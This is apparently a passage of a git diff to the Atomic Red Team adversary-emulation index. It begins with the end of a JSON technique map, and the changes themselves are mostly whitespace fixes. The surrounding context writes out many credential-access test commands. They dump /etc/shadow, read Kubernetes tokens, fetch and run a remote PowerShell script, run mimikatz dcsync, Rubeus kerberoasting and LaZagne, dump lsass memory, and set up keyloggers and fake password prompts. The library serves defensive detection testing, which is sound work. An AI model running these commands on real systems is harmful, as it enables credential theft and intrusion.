Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..167324d3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed -' + ' supported_platforms: - linux input_arguments: @@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins -' + ' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" -' + ' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. -' + ' supported_platforms: - containers input_arguments: @@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get secrets -n #{namespace} -' + ' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. -' + ' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod -' + ' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity -' + ' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod -' + ' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; -' + ' executor: name: bash elevation_required: false @@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -' + ' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all -' + ' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b @@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed -' + ' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File -' + ' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp -' + ' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore -' + ' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | @@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -' + ' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" -' + ' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. -' + ' supported_platforms: - windows input_arguments: @@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" -' + ' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: name: powershell elevation_required: false @@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'setspn -T #{domain_name} -Q */* -' + ' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 @@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: @@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. @@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe 